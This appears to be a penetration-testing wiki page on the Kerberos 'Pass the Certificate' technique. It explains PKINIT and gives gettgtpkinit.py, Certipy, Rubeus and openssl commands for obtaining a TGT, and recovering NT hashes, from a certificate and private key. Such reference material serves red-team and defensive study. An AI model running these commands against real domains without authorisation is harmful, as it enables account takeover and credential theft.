Pass the Certificate

Theory

The Kerberos authentication protocol works with tickets in order to grant access. An ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can only be obtained by validating a first step named "pre-authentication" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast). The pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates). The asymmetrical way of pre-authenticating is called PKINIT.
Pass the Certificate is the fancy name given to the pre-authentication operation relying on a certificate (i.e. key pair) to pass in order to obtain a TGT. This operation is often conducted along shadow credentials, AD CS escalation and UnPAC-the-hash attacks.
Keep in mind a certificate in itself cannot be used for authentication without the knowledge of the private key. A certificate is signed for a specific public key, that was generated along with a private key, which should be used when relying on a certificate for authentication.
The "certificate + private key" pair is usually used in the following manner
  • PEM certificate + PEM private key
  • PFX certificate export (which contains the private key) + PFX password (which protects the PFX certificate export)

Practice

UNIX-like
Windows
From UNIX-like systems, Dirk-jan's gettgtpkinit.py from PKINITtools tool to request a TGT (Ticket Granting Ticket) for the target object. That tool supports the use of the certificate in multiple forms.
1
# PFX certificate (file) + password (string, optionnal)
2
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
3
โ€‹
4
# Base64-encoded PFX certificate (string) (password can be set)
5
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
6
โ€‹
7
# PEM certificate (file) + PEM private key (file)
8
gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
Copied!
Alternatively, Certipy (Python) can be used for the same purpose.
1
certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
Copied!
Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.
1
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
Copied!
The ticket obtained can then be used to
When using Certipy for Pass-the-Certificate, it automatically does UnPAC-the-hash to recover the account's NT hash, in addition to saving the TGT obtained.
From Windows systems, Rubeus (C#) can be used to request a TGT (Ticket Granting Ticket) for the target object from a base64-encoded PFX certificate export (with an optional password).
1
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
Copied!
PEM certificates can be exported to a PFX format with openssl. Rubeus doesn't handle PEM certificates.
1
openssl pkcs12 -in "cert.pem" -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out "cert.pfx"
Copied!
Certipy uses DER encryption. To generate a PFX for Rubeus, openssl can be used.
1
openssl rsa -inform DER -in key.key -out key-pem.key
2
openssl x509 -inform DER -in cert.crt -out cert.pem -outform PEM
3
openssl pkcs12 -in cert.pem -inkey key-pem.key -export -out cert.pfx
Copied!
The ticket obtained can then be used to
  • authenticate with pass-the-ticketโ€‹
  • conduct an UnPAC-the-hash attack (add the /getcredentials flag to Rubeus's asktgt command)
  • obtain access to the account's SPN with an S4U2Self.
Copy link